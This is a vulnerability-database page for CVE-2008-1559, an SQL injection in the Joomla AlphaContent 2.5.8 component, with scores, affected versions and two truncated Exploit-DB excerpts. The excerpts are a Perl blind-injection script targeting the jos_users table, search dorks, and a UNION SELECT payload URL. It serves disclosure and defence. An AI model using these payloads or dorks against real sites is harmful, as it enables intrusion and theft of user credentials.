CVE-2008-1559
published 2008-03-31CVE-2008-1559: SQL injection vulnerability in the Bernard Gilly AlphaContent (com_alphacontent) 2.5.8 component for Joomla! allows remote attackers to execute arbitrary SQL…
PriorityP337medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
0.92%
55.7th percentile
SQL injection vulnerability in the Bernard Gilly AlphaContent (com_alphacontent) 2.5.8 component for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter in a view action to index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bernard_gilly | com_alphacontent | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Joomla! Component Alphacontent 2.5.8 - Blind SQL Injection
exploitdb·2008-04-27
CVE-2008-1559 Joomla! Component Alphacontent 2.5.8 - Blind SQL Injection
Joomla! Component Alphacontent 2.5.8 - Blind SQL Injection
---
#!/usr/bin/perl
#eSploit Framework - Inphex
use Digest::MD5 qw(md5 md5_hex md5_base64);
use LWP::UserAgent;
use HTTP::Cookies;
use Switch;
$host_ = shift;
$path_ = shift;
$id_ = shift;
$non_find = shift; #choose anything thats inside the article of id
$column = "username"; #change if needet
$table = "jos_users"; #change if needet
print "usage: $0 http://host.com / 17 Following";
$info{'info'} = {
"author" => ["cO2,Inphex"],
"name" => ["Joomla com_alphacontent Blind SQL Injection"],
"version" => [],
"description" => ["This Script will exploit a Blind SQL Injection vulnerability in com_alphacontent\n"],
"options" =>
{
"agent" => "",
"proxy" => "",
"default_headers" => [
["key","value"]],
"timeout" => 2,
"cookie" =>
{
"cookie" =
Exploit-DB
Joomla! Component Alphacontent 2.5.8 - 'id' SQL Injection
exploitdb·2008-03-25
CVE-2008-1559 Joomla! Component Alphacontent 2.5.8 - 'id' SQL Injection
Joomla! Component Alphacontent 2.5.8 - 'id' SQL Injection
---
##########################################
#
# [ Joomla Component com_alphacontent SQL Injection ]
#
##########################################
[~] Vulnerability found by: cO2 [ Algeria Security Crew ]
[~] Contact: c02[at]hotmail.de
[~] Website: http://www.dzw0rm.ch
[~] Greetings: to all hackers DZ
##########################################
[~] ScriptName : 'Joomla'
[~] ModuleName : 'AlphaContent'
[~] Version() : '2.5.8 '
###########################################
#
# DORK 1 : inurl: "com_alphacontent"
#
# DORK 2 : "AlphaContent 2.5.8 © 2005-2008 - visualclinic.fr"
#
###########################################
[+]Exploit :
index.php?option=com_alphacontent§ion=6&cat=15&task=view&id=-999999/**/union/**/select/**/1,concat(use
No writeups or analysis indexed.
2008-03-31
Published